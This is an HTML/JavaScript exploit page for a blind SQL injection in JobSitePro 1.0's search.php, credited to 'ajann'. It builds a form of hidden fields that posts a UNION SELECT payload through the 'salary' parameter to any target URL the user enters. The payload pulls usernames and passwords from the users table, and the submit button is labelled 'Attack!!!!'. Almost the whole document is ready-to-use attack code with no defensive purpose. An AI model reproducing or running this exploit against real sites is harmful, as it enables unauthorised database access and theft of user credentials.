JobSitePro 1.0 (search.php) Remote SQL Injection Exploit

<html> <head> <meta&nbsp;http-equiv=\"Content-Type\"&nbsp;content=\"text/html;&nbsp;charset=windows-1254\"> </head> <body> <div> <script&nbsp;language=\"JavaScript\"> //Coded&nbsp;by&nbsp;ajann //\'=============================================================================================== //\'[Script&nbsp;Name:&nbsp;JobSitePro&nbsp;1.0&nbsp;(search.php)&nbsp;Remote&nbsp;BLIND&nbsp;SQL&nbsp;Injection&nbsp;Exploit //\'[Coded&nbsp;by&nbsp;&nbsp;&nbsp;:&nbsp;ajann //\'[Author&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;ajann //\'[Contact&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;:( //\'[S.Page&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;http://phplabs.com/ //\'[$$&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;39.95&nbsp;$ //\'[Using&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Write&nbsp;Target&nbsp;after&nbsp;Submit&nbsp;Click //\'=============================================================================================== tittle=\'JobSitePro&nbsp;1.0&nbsp;(search.php)&nbsp;Remote&nbsp;BLIND&nbsp;SQL&nbsp;Injection&nbsp;Exploit\' value=\'\"\'; sql=\'1&nbsp;union&nbsp;select&nbsp;1,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,58),password),3&nbsp;from&nbsp;users/*\'; valueclose=\'\">\'; attack=value+sql+valueclose; document.write(\'<title>\'&nbsp;+&nbsp;tittle&nbsp;+&nbsp;\'</title>\') document.write(\'<body&nbsp;bgcolor=\"#000000\">\'); document.write(\'<p><b><font&nbsp;face=\"Verdana\"&nbsp;size=\"2\"&nbsp;color=\"#008000\">\'&nbsp;+&nbsp;tittle&nbsp;+&nbsp;\'</font></b></p>\'); document.write(\'<form&nbsp;method=\"post\"&nbsp;name=\"form1\"&nbsp;action=\"http://phplabs.com/demo/jobsitepro/search.php\"&nbsp;enctype=\"multipart/form-data\"&nbsp;onSubmit=\"send();\">\'); document.write(\'<b><font&nbsp;color=\"#008000\"><font&nbsp;face=\"Verdana\"&nbsp;size=\"1\">Target</font><font&nbsp;face=\"Verdana\"&nbsp;size=\"1\">[site.com/path]:</font></font></b>\'); document.write(\'<form&nbsp;method=\"post\"&nbsp;name=\"form1\"&nbsp;action=\"a\"&nbsp;enctype=\"multipart/form-data\">\') document.write(\'&nbsp;&nbsp;&nbsp;\') document.write(\'<input&nbsp;type=\"text\"&nbsp;name=\"hedef\"&nbsp;value=\"http://\"&nbsp;onChange=\"control();\">\') document.write(\'<SELECT&nbsp;name=\"jobtype\"&nbsp;style=\"visibility:&nbsp;hidden;\">\') document.write(\'<OPTION&nbsp;value=\"all\"&nbsp;SELECTED>All&nbsp;Categories</OPTION>\') document.write(\'</SELECT>\') document.write(\'<input&nbsp;name=\"city\"&nbsp;type=\"text\"&nbsp;id=\"city\"&nbsp;size=\"45\"&nbsp;style=\"visibility:&nbsp;hidden;\">\') document.write(\'<select&nbsp;name=\"state\"&nbsp;style=\"visibility:&nbsp;hidden;\">\') document.write(\'<option&nbsp;value=\"all\"&nbsp;selected>\') document.write(\'</option>\') document.write(\'</select>\') document.write(\'<select&nbsp;name=\"country\"&nbsp;style=\"visibility:&nbsp;hidden;\">\') document.write(\'<option&nbsp;value=\"US\"&nbsp;selected>United&nbsp;States&nbsp;</option>\') document.write(\'</select>\') document.write(\'<input&nbsp;name=\"keywords\"&nbsp;type=\"text\"&nbsp;id=\"keywords\"&nbsp;value=\"&nbsp;\"&nbsp;style=\"visibility:&nbsp;hidden;\">\') document.write(\'<input&nbsp;name=\"boolean\"&nbsp;type=\"radio\"&nbsp;value=\"any\"&nbsp;checked&nbsp;style=\"visibility:&nbsp;hidden;\">\') document.write(\'<select&nbsp;name=\"date\"&nbsp;id=\"date\"&nbsp;style=\"visibility:&nbsp;hidden;\">\') document.write(\'<option&nbsp;value=\"all\"&nbsp;selected>List&nbsp;All&nbsp;Jobs</option>\') document.write(\'</select>\') document.write(\'<select&nbsp;name=\"exempt\"&nbsp;id=\"exempt\"&nbsp;style=\"visibility:&nbsp;hidden;\">\') document.write(\'<option&nbsp;value=\"all\"&nbsp;selected>Any</option>\') document.write(\'</select>\') document.write(\'<input&nbsp;name=\"salary\"&nbsp;style=\"visibility:&nbsp;hidden;\"&nbsp;type=\"text\"&nbsp;id=\"salary\"&nbsp;size=\"10\"&nbsp;value=\'&nbsp;+&nbsp;attack) document.write(\'<select&nbsp;name=\"perpage\"&nbsp;id=\"perpage\"&nbsp;style=\"visibility:&nbsp;hidden;\">\') document.write(\'<option&nbsp;value=\"25\"&nbsp;selected>25</option>\') document.write(\'</select>\') document.write(\'<input&nbsp;name=\"act\"&nbsp;type=\"hidden\"&nbsp;id=\"act\"&nbsp;value=\"dosearch\">\') document.write(\'<br><input&nbsp;type=\"submit\"&nbsp;name=\"Submit\"&nbsp;value=\"Attack!!!!\"\') document.write(\'</form>\') &nbsp;&nbsp;&nbsp;function&nbsp;control()&nbsp;{ &nbsp;if&nbsp;(document.form1.hedef.value==\"\"){ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;alert(\"Please&nbsp;all&nbsp;fields&nbsp;correct!\"); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;} &nbsp;&nbsp;} &nbsp;function&nbsp;send()&nbsp;{ target=document.form1.hedef.value; file=\'search.php\'; document.form1.action=target+file; &nbsp;&nbsp;&nbsp;} </script> </div> </body> </html> &nbsp;